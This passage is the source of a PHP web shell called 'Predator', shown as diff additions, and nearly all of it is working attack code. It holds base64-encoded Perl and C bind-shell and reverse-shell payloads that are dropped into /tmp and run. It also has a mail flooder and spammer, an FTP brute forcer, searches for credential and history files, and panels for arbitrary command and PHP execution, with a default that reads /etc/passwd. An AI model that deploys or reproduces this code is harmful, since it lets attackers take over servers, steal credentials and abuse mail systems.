+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+
+if($method=='Perl')
+	{
+		fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
+		fclose($i);
+		ex(which("perl")." /tmp/shlbck ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('ps -aux | grep shlbck');
+	}
+elseif($method=='C#')
+	{
+		fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
+		fclose($i);
+		ex("gcc shlbck.c -o shlbck");
+		unlink('shlbck.c');
+		ex("/tmp/shlbck ".$port." ".$pass." &");
+		unlink("/tmp/shlbck");
+		return ex('ps -aux | grep shlbck');
+	}else
+	{
+	return 'Choose method';
+	}
+
+}
+
+function backconnect($ip,$port,$method)
+{
+$perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if($method=='Perl')
+	{
+		fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
+		fclose($i);
+		ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('netstat -an | grep -i listen');
+	}
+elseif($method=='C#')
+	{
+		fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
+		fclose($i);
+		ex("gcc shlbck.c -o shlbck");
+		unlink('shlbck.c');
+		ex("/tmp/shlbck ".$ip." ".$port." &");
+		unlink("/tmp/shlbck");
+		return ex('netstat -an | grep -i listen');
+	}else
+	{
+	return 'Choose method';
+	}
+}
+
+if($_POST['type']==11){download(stripslashes($_POST['value']));};
+
+function download($dfilename)
+{
+	$file=fopen($dfilename,"r");
+	ob_clean();
+    $filename = basename($dfilename);
+    $filedump = fread($file,@filesize($dfilename));
+    fclose($file);
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+}
+
+function flooder($logf,$to,$from,$subject,$msg,$amount,$check)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($logf, "w");
+$count = 0;
+if(!$logf){
+return "Fill 'log_file' field!";
+}elseif(!$to){
+return "Fill 'Send to' field!";
+}elseif(!$from){
+return "Fill 'From' field!";
+}elseif(!$subject){
+return "Fill 'Subject' field!";
+}elseif(!$msg){
+return "Fill 'Message' field!";
+}elseif(!$amount){
+return "Fill 'Amount' field!";
+}else{
+	while($count < $amount){
+		mail("$to", "$subject", "$msg", "From: $from");
+		$count = $count + 1;
+		$fl = fopen($logf, "w");
+		fputs($fl, "$count flood-letters was sended...");
+		fclose($fl);	
+	}
+	if(strlen($check) != 0){
+		$check_text = "Done! $count flood-letters was sended!";
+		$check_sub = 'Check';
+		mail("$check", "$check_sub", "$check_text", "From: $from");
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count flood-letters was sended!");
+	}
+	else{
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count flood-letters was sended!");
+	}
+}
+fclose($fl);
+}
+
+function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($ftp_users, "r");
+$fd = fopen($ftp_passwd, "r");
+$fr = fopen($ftp_log, "a+");
+if(!$host){
+return "Fill 'Host' field!";
+}elseif(!$ftp_users){
+return "Fill 'ftp_users file' field!";
+}elseif(!$ftp_passwd){
+return "Fill 'ftp_passwd file' field!";
+}elseif(!$ftp_log){
+return "Fill 'ftp_log file' field!";
+}elseif(!file_exists($ftp_users)){
+return "File ".$ftp_users." doesn't exists!";
+}elseif(!file_exists($ftp_passwd)){
+return "File ".$ftp_passwd." doesn't exists!";
+}
+else{
+	while(!feof($fd)){
+        	$pass = fgets($fd);
+                	while(!feof($fl)){
+                        	$user = fgets($fl);
+                                $connect = ftp_connect($host);
+                                if(!$connect){
+                                	fputs($fr, "Enable connect to $host\n");
+                                        exit;
+                                }else{
+                                	$auth = ftp_login($connect, $user, $pass);
+                                	if(!$auth){
+                                		ftp_quit($connect);
+                                	}
+                                	else{
+                                		fputs($fr, "$host:\n---$login:$pass\n---");
+                                		ftp_quit($connect);
+                                	} 
+                                }
+                	}
+	}
+	fputs($fr, "Done:\n");
+	fclose($fr);
+}
+fclose($fl);
+fclose($fd);
+}
+
+function spammer($from,$subject,$msg,$check,$elist,$logf)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fp = fopen($elist. "r");
+$fl = fopen($logf, "w");
+$count = 0;
+if(!$from){
+return "Fill 'From' field!";
+}elseif(!$elist){
+return "Fill 'Emails list' field!";
+}elseif(!$logf){
+return "Fill 'Log File' field!";
+}elseif(!$msg){
+return "Fill 'Message' field!";
+}elseif(!$subject){
+return "Fill 'Subject' field!";
+}elseif(!file_exists($elist)){
+return "File ".$elist." doesn't exists!";
+}else{
+	while(!feof($fp)){
+		$to = fgets($fp);
+		mail("$to", "$subject", "$msg", "From: $from");
+		$count = $count + 1;
+		$fl = fopen($logf, "w");
+		fputs($fl, "$count letters was sended...");
+		fclose($fl);
+	}
+	if(strlen($check) != 0){
+		$check_text = "Done! $count letters was sended!";
+		$check_sub = 'Check';
+		mail("$check", "$check_sub", "$check_text", "From: $from");
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count letters was sended!\n");
+	}
+	else{
+		$fl = fopen($logf, "w");
+		fputs($fl, "Done! $count letters was sended!");
+	}
+}
+fclose($fp);
+fclose($fl);
+}
+
+function alias($in)
+{
+if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');}
+elseif($in=="find access_log files"){return ex('find / -type f -name access_log');}
+elseif($in=="find error_log files"){return ex('find / -type f -name error_log');}
+elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');}
+elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');}
+elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');}
+elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');}
+elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');}
+elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');}
+elseif($in=="find config* files"){return ex('find / -type f -name "config*"');}
+elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');}
+elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');}
+elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');}
+elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');}
+elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');}
+elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');}
+elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');}
+elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');}
+elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');}
+elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');}
+elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');}
+elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');}
+elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');}
+elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');}
+elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');}
+elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');}
+elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');}
+elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');}
+elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');}
+elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');}
+}
+
+function testperl()
+{
+	if(ex('perl -h'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testlynx()
+{
+	if(ex('lynx --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function testfetch()
+{
+	if(ex('fetch --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testwget()
+{
+	if(ex('wget --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function oracle()
+{
+	if(function_exists('ocilogon'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function postgresql()
+{
+	if(function_exists('pg_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testmssql()
+{
+	if(function_exists('mssql_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function testcurl()
+{
+	if(function_exists('curl_version'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function testmysql()
+{
+	if(function_exists('mysql_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function safe_mode()
+{
+if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
+	{
+		$_SESSION['safe_mode'] = 1;
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		$_SESSION['safe_mode'] = 0;
+		return "<font size=2 color=red>OFF</font>";
+	}
+};
+
+function ex($in)
+{
+$out = '';
+
+
+if(function_exists('exec'))
+	{
+		exec($in,$out);
+		$out = join("\n",$out);
+	}
+elseif(function_exists('passthru'))
+	{
+		ob_start();
+		passthru($in);
+		$out = ob_get_contents();
+		ob_end_clean();
+	}
+elseif(function_exists('system'))
+	{
+		ob_start();
+		system($in);
+		$out = ob_get_contents();
+		ob_end_clean();
+	}
+elseif(function_exists('shell_exec'))
+	{
+		$out = shell_exec($in);
+	}
+elseif(is_resource($f = popen($in,"r")))
+  {
+   $out = "";
+   while(!@feof($f)) { $out .= fread($f,1024); }
+   pclose($f);
+  }
+return $out;
+}
+
+function shell()
+{
+if($_POST['type']==1)
+	{		
+		eval(stripslashes($_POST['value']));
+	}
+elseif($_POST['type']==2)
+	{
+		pwd();
+		print_r(ex(stripslashes($_POST['value'])));
+	}
+elseif($_POST['type']==3)
+	{
+		if($_SESSION['safe_mode'] == 1){
+		if(($u=safe_ex('ls -la'))!='')
+		{return $u;}else{return safe_ex('dir');};
+		
+		}else{
+		if(($u=ex('ls -la'))!='')
+		{return $u;}else{return ex('dir');};
+		}
+	}
+elseif($_POST['type']==4)
+	{
+		if(file_exists(stripslashes($_POST['value'])))
+			{
+				if($safe_mode!=1){
+				echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
+				}else{
+				echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
+				};
+				$_SESSION['edit']=1;
+				$_SESSION['filename'] = $_POST['value'];
+			}else{
+				return 'File doesn\'t exists!';
+			}
+	}
+elseif($_POST['type']==5)
+	{
+		fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
+	}
+elseif($_POST['type']==6)
+	{
+		$uploaddir = pwd();
+		if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
+		move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); 	
+	}
+elseif($_POST['type']==7)
+	{
+		echo alias($_POST['value']);
+	}
+elseif($_POST['type']==8)
+	{
+		echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
+	}
+elseif($_POST['type']==9)
+	{
+		echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
+	}
+elseif($_POST['type']==10)
+	{
+		echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
+	}
+elseif($_POST['type']==12)
+	{
+		echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
+	}
+elseif($_POST['type']==13)
+	{
+		echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
+	}
+elseif($_POST['type']==14)
+	{
+		echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
+	}
+
+else 
+	{$u = ex('ls -la');
+	 if($u == ''){return ex('dir');}else{return $u;};
+	}
+
+return null;
+};
+
+function edit()
+{
+if ($_SESSION['edit'] == 1){
+$_SESSION['edit']=0;
+return "<br><center><input type=submit style=\"border:1px solid #666666;background:#333333;font-weight:bold;\" value=\"Save\"></center>";};
+}
+
+function getsystem()
+{
+	return php_uname('s')." ".php_uname('r')." ".php_uname('v');
+};	
+
+function getserver()
+{
+	return getenv("SERVER_SOFTWARE");
+};
+
+
+function getuser()
+{
+$out = get_current_user();	
+	if($out!="SYSTEM")
+		{
+			if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
+		}
+return $out;
+};
+
+function pwd()
+{
+if($_POST['type']==3)
+	{
+		$_SESSION['pwd'] = stripslashes($_POST['value']);
+	}
+chdir($_SESSION['pwd']);
+$cwd = getcwd();
+if($u=strrpos($cwd,'/'))
+	{
+		if($u!=strlen($cwd)-1){
+		return $cwd.'/';}
+		else{return $cwd;};
+	}
+elseif($u=strrpos($cwd,'\\'))
+	{
+		if($u!=strlen($cwd)-1){
+		return $cwd.'\\';}
+		else{return $cwd;};
+	};
+}
+
+function safe_ex($in)
+{
+if($in){
+$d=dir('.');
+
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y	 H:i",$mtime)."	";
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+}
+
+function safe_read($in)
+{
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+include("/etc/passwd");
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+
+file_get_contents($in);
+}
+
+}
+?>
+
+
+
+
+
+
+
+
+
+
+<html>
+<head>
+<title>.::Predator::.</title>
+<META http-equiv="Content-Type" content="text/html; charset=CP866">
+<style type=text/css>
+.ta {background: #333333; border:1px solid #666666; color: #FFFFFF;}
+.bt {border: 1px solid #666666;background: #333333;font-weight:bold;}
+.td1 {border:2px solid #000000;}
+.td2 {border:1px solid #000000;}
+.ram {border:1px solid #666666;background:#222222;}
+body { scrollbar-base-color: #333333}
+</style>
+<script>
+function kill()
+{
+var y;
+y = confirm('Are you really want to kill shell?');
+if(y == true)
+{
+document.location = '?kill=yes';
+}
+}
+</script>
+</head>
+<body bgcolor='#000000'>
+<center><table width=90% cellpadding=0 cellspacing=0 style="border: 1px solid #666666">
+<tr><td width=100% height=70 bgcolor='#333333' style="border-bottom: 2px solid #666666" valign=top>
+<table valign=top>
+<tr><td valign=top>
+<table valign=center class='ram'>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>System:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getsystem();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>Server:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getserver();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>User:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getuser();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>pwd:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></b></font>
+</td></tr>
+</table>
+</td>
+<td width=13% valign=center align=center>
+<table width=100% height=100% cellpadding=0 cellspacing=0><tr><td width=100% height=100%>
+<center>
+<a href="http://h0ld-up.info"><table cellpadding=2 cellspacing=2 style="border:1px solid #666666;background:#444444">
+<tr><td><font size=2 color=#999999>
+<center><b>.::h0ld-up-team::.<br>web-shell</b></center>
+</font></td></tr></table></a></center>
+</td></tr><tr><td height=5></td></tr><tr><td>
+<center>
+
+<input type=submit style="border:1px solid #666666;background: darkred;font-weight:bold;" value='   Kill Shell   ' onclick='kill()'>
+
+</center>
+</td></tr></table>
+
+</td>
+<td class='ram' width=45% valign=center align=center>
+<table  cellpadding=0 cellspacing=0>
+<tr><td>
+<table valign=top cellpadding=0 cellspacing=0>
+<tr><td align=right>
+<font size=2 color='#888888'>PHP-version:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>MySQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>MSSQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>PostgreSQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>Oracle:</font>
+</td></tr>
+</table>
+</td><td>
+<table valign=top  cellpadding=0 cellspacing=0>
+<tr><td>
+<b><font size=2 color=red><?php echo phpversion();?></font></b>
+</td></tr>
+<tr><td>
+<b><?php echo testmysql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo testmssql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo postgresql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo oracle();?></b>
+</td></tr>
+</table>
+</td><td width=4%></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Safe_mode:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>cURL:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>wget:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>fetch:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>lynx:</font>
+</td></tr>
+</table></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top>
+<b><?php echo safe_mode();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testcurl();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testwget();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testfetch();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testlynx();?></b>
+</td></tr>
+</table></td>
+<td width=4%></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Perl:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Server time:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Server date:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Total space:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Free space:</font>
+</td></tr>
+</table></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top>
+<b><font size=2 color=green><?php echo testperl();?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo date('H:i');?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo date('d-m-Y');?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo view_size(disk_total_space(getcwd()));?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo view_size(diskfreespace(getcwd()));?></font></b>
+</td></tr>
+</table></td></tr>
+</table>
+</td></tr>
+</table>
+</td></tr>
+<tr><td width=100% height=100% bgcolor='#333333' valign=top>
+<table width=100%>
+<tr><td valign=top align=center>
+<table width=100% height=200 class='td1'>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<input type=hidden name="type" value=5>
+<textarea cols=80 rows=13 name="value" class='ta'>
+<?php echo htmlspecialchars(shell());?>
+</textarea><?php echo edit();?></form>
+</td>
+
+
+
+<td valign=top align=left width=10%>
+<table width=100% height=100% class='td2'>
+<form action method=POST><tr><td valign=top align=left height=40% style="border-bottom: 1px solid #000000;">
+<b>.::System shell::.</b><br>
+<input type=hidden name="type" value=2>
+<center><input type=text name="value" size=35 class='ta'></center>
+</ br><center><input type=submit value="Enter" style="border-top: 1px solid #333333;border-bottom: 1px solid #666666;border-right: 1px solid #666666;border-left: 1px solid #666666;background: #333333;font-weight:bold;"></center>
+</td></tr></form>
+<tr><td valign=top align=left>
+<form action method=POST>
+<table>
+<tr><td>
+<b>.::PHP-code::.</b>
+</td><td align=right>
+<input type=submit value="Run code" class='bt'>
+<input type=hidden name="type" value=1>
+</td></tr>
+<tr><td colspan=2>
+<textarea rows=5 cols=26 name="value" class='ta'><?php echo "readfile('/etc/passwd');";?></textarea>
+</td></tr>
+</table></form>
+</td></tr>
+</table>
+</td></tr>
+</table>
+<table>
+<tr><td height=0></td></tr>
+</table>
+<table width=100% height=80 class='td1' valign=top>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::PWD::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="cd">
+<input type=hidden name="type" value=3>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
+</td></tr>
+</table></form></td><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::File Edit::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="Edit">
+<input type=hidden name="type" value=4>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=72 value=<?php echo pwd();?>>
+</td></tr>
+</table></form>
+</td></tr>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Download::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="Download">
+<input type=hidden name="type" value=11>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
+</td></tr>
+</table></form></td><td valign=top align=left width=50%>
+<form enctype="multipart/form-data" action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Upload::.</b>
+</td><td align=right colspan=3>
+<input type=submit class='bt' value="Upload">
